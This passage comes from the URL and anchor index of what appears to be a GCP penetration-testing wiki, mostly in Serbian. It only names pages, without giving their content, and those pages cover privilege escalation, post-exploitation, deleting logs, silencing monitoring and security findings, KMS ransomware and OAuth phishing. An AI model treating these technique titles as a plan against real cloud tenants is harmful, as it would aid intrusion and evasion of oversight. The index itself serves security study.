-basic-information/gcp-federation-abuse.html#github","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#gcp---dozvole-za-pentest","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#dozvole-pojedinačnih-alata","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#purplepanda","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#scoutsuite","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cloudsploit","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#cartography","pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.html#starbase","pentesting-cloud/gcp-security/gcp-post-exploitation/index.html#gcp---post-eksploatacija","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#gcp---app-engine-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#app-engine","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#appenginememcacheaddkey--appenginememcachelist--appenginememcachegetkey--appenginememcacheflush","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#loggingviewsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#Čitaj-izvorni-kod","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.html#izmeni-izvorni-kod","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#gcp---post-eksploatacija-artifact-registry","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#artifact-registry","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.html#privesc","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#gcp---cloud-build-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloud-build","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.html#cloudbuildbuildsapprove","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#gcp---cloud-functions-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloud-functions","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#cloudfunctionsfunctionssourcecodeget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.html#ukradi-cloud-function-zahteve","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#gcp---cloud-run-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#cloud-run","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#pristup-slikama","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.html#izmenite-i-ponovo-implementirajte-sliku","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#gcp---cloud-shell-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#cloud-shell","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#container-escape","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.html#koristite-ga-kao-proxy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#gcp---cloud-sql-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloud-sql","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesupdate--cloudsqlinstancesget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqluserscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlusersupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesrestorebackup-cloudsqlbackuprunsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlbackuprunsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesexport-storageobjectscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqlinstancesimport-storageobjectsget","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.html#cloudsqldatabasesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#gcp---compute-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#compute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#izvoz-i-inspekcija-slika-lokalno","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#izvoz-i-inspekcija-snimaka-i-diskova-lokalno","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspekcija-slike-kreiranjem-vm-a","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.html#inspekcija-snimkadiska-povezivanjem-na-vm","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#gcp---filestore-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#mount-filestore","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#uklonite-ograničenja-i-dobijte-dodatne-dozvole","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#restore-a-backup","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.html#napravite-rezervnu-kopiju-i-vratite-je","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#gcp---iam-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#iam","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.html#dodeljivanje-pristupa-upravljačkoj-konzoli","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#gcp---kms-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsdestroy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoencrypt--cloudkmscryptokeyversionsusetoencryptviadelegation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetosign","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.html#cloudkmscryptokeyversionsusetoverify","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#gcp---logging-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#osnovne-informacije","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#podrazumevano-logovanje","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#dodaj-izuzeti-princip","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#Čitaj-logove---logginglogentrieslist","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#zapišite-logove---logginglogentriescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingbucketsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingviewsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#logginglogmetricsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.html#loggingsinksupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#gcp---monitoring-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoring","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringalertpoliciesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringdashboardsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozescreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringsnoozesupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.html#monitoringnotificationchannelsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#gcp---pubsub-post-exploatacija","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsub","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicspublish","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdetachsubscription","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubtopicssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionscreate-pubsubtopicsattachsubscription--pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasattach-pubsubtopicsupdatepubsubschemascreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemasdelete","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubschemassetiampolicy","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.html#pubsubsnapshotscreate-pubsubsnapshotsseek","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#gcp---secretmanager-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanager","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#gcp---bezbednost-post-eksploatacije","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#bezbednost","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigscreate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycentermuteconfigsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsbulkmuteupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingssetmute","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.html#securitycenterfindingsupdate","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#gcp---workflows-post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#workflow","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.html#post-exploitation","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#gcp---post-eksploatacija-skladišta","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#cloud-storage","pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.html#dati-javni-pristup","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#gcp---privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#introduction-to-gcp-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#permissions-for-privilege-escalation-methodology","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#bypassing-access-scopes","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#tehnike-eskalacije-privilegija","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#zloupotreba-gcp-a-za-lokalnu-eskalaciju-privilegija","pentesting-cloud/gcp-security/gcp-privilege-escalation/index.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#gcp---apikeys-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#brute-force-api-key-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysgetkeystring--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#apikeyskeysundelete--apikeyskeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.html#kreirajte-internu-oauth-aplikaciju-za-phishing-drugih-radnika","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#gcp---appengine-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsget-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineoperationslist-appengineservicesget-appengineserviceslist-appengineversionscreate-appengineversionsget-appengineversionslist-cloudbuildbuildsgetiamserviceaccountsactas-resourcemanagerprojectsget-storageobjectscreate-storageobjectslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#ažurirajte-ekvivalentne-dozvole","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineinstancesenabledebug-appengineinstancesget-appengineinstanceslist-appengineoperationsget-appengineservicesget-appengineserviceslist-appengineversionsget-appengineversionslist-computeprojectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineapplicationsupdate-appengineoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#appengineversionsgetfilecontents-appengineversionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-buckets","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.html#write-access-over-the-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#gcp---artifact-registry-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.html#artifactregistryrepositoriesuploadartifacts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#gcp---batch-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batch","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.html#batchjobscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#gcp---bigquery-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquery","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#Čitanje-tabele","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#izvoz-podataka","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#unesite-podatke","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerydatasetsupdate-bigquerydatasetsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigquerytablessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.html#bigqueryrowaccesspoliciesupdate-bigqueryrowaccesspoliciessetiampolicy-bigquerytablesgetdata-bigqueryjobscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#gcp---clientauthconfig-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.html#kreirajte-oauth-brend-i-klijenta","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#gcp---cloudbuild-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuild","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildscreate-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildbuildsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildrepositoriesaccessreadwritetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.html#cloudbuildconnectionsfetchlinkablerepositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#gcp---cloudfunctions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionscreate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate--cloudfunctionsfunctionssourcecodeset---iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssourcecodeset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionssetiampolicy-iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#cloudfunctionsfunctionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#pristup-za-čitanje-i-pisanje-nad-bucket-om","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#pristup-za-čitanje-i-pisanje-nad-artifact-registry","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#gcp---cloudidentity-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#cloudidentity","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#dodajte-se-u-grupu","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.html#izmeni-članstvo-u-grupi","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#gcp---cloud-scheduler-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloud-scheduler","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobscreate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#cloudschedulerjobsupdate-iamserviceaccountsactas-cloudschedulerlocationslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#gcp---compute-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#compute","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeprojectssetcommoninstancemetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetmetadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesoslogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancesosadminlogin","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computeinstancescreateiamserviceaccountsactas-computediskscreate-computeinstancescreate-computeinstancessetmetadata-computeinstancessetserviceaccount-computesubnetworksuse-computesubnetworksuseexternalip","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#osconfigpatchdeploymentscreate--osconfigpatchjobsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computemachineimagessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computesnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#computediskssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#obilaženje-pristupnih-opsega","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#lokalno-eskaliranje-privilegija-u-gcp-compute-instanci","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/index.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---dodavanje-prilagođenih-ssh-metapodataka","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#gcp---dodavanje-prilagođenih-ssh-metapodataka-1","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#modifikacija-metapodataka","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#gcp---composer-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#composerenvironmentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#preuzmi-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#uvoz-dags","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#write-access-to-the-composer-bucket","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-plugins","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#import-data","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#container","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---deploymentmaneger-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignblob","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignjwt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetopenidtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#reference","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#gcp---kms-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#kms","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecrypt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyssetiampolicy","p